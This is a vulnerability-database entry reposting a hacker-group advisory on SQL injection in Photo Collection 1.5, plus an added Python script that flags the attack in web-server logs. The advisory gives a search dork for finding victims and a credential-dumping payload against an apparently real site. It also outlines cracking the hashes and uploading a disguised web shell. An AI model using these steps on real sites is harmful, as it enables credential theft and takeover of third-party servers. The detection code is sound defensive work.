Photo Collection 1.5 SQL Injection

Vulnerability ID: 1047286    Vulnerability type:
Published: 2012-06-13    Updated: 2012-06-13
CVE ID: N/A    CNNVD-ID: N/A
Affected platform: N/A    CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2012060140
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability EXP
-------------------- IN The NAme OF God --------------------

-====Photo collection Remote Sql Injection Vulnerability====-

# Exploit Title: Photo collection Remote Sql Injection Vulnerability
# Exploit Author: Mr.XpR
# Tested on: BackTrack , 7 , Redhat
# Version : 1.5
# MAil : No0pm@yahoo.com
-====Dork====-

inurl:index.php?Blog=*&user_id=

intext: Copyright (c) 2010-2012 by photo collection. All rights reserved!

-====Exploit====-

http://Site.C0M/index.php?Blog=11&user_id=[Sqli]

-====Example====-

http://www.dakghor.com/index.php?Blog=11&user_id=-9999+union+select+group_concat%28user_name,0x3a,user_password%29+from+be_users--

-====information====-

Crack Joomla Hash IN ~~~ > http://www.md5decrypter.co.uk/

Admin Page ~~~~~~~~~> Front PAge With Email And PAssword

Login To panel :D 

Click <<--- Add Profile Picture or Add Picture  -----Upload She3ll~~~> Sh3ll.jpg 0r Sh3ll.php.Jpg

And Load From  http://www.xxxxx.com/images/users/Sh3ll.jpg

-====Tnx To====-

Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz

MR.XpR - MMT - Samim.s - FarbodEZRaeL - Inj3Ctor - Black.Viper - UnknowN 

Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members

~~~~~~~~~~~~~~~~~~~~~~>> IRANHaCK.ORG
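
Added example for defenders, not part of the original advisory or of Photo Collection's own code: a log check that flags requests to index.php whose Blog or user_id parameter is not a plain integer, which is the request shape the advisory describes. It assumes both parameters are non-negative integer IDs in normal use and that the web server writes a combined-format access log; the log lines and client addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: in normal use Blog and user_id carry only non-negative integers.
NUMERIC_PARAMS = ("Blog", "user_id")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]+")

def suspicious_params(target):
    """Return {param: decoded value} for ID parameters that are not pure digits."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/index.php"):
        return {}
    # parse_qs URL-decodes values, so %27 and '+' are seen as ' and space.
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if not DIGITS_RE.fullmatch(value):
                bad[name] = value
    return bad

def scan(lines):
    """Return (line number, client address, offending params) per flagged entry."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_params(match.group(1))
        if bad:
            findings.append((lineno, line.split(" ", 1)[0], bad))
    return findings

# Constructed sample log lines (documentation-range addresses, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jun/2012:10:00:01 +0000] '
    '"GET /index.php?Blog=11&user_id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Jun/2012:10:00:05 +0000] '
    '"GET /index.php?Blog=11&user_id=-9999+union+select+1-- HTTP/1.1" 200 734',
    '192.0.2.10 - - [13/Jun/2012:10:00:09 +0000] '
    '"GET /images/users/a.jpg HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for lineno, client, bad in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent non-numeric {bad}")
```

A hit shows only that such a request was made. The underlying fix is in the application: validate user_id as an integer and pass it to the database as a bound parameter.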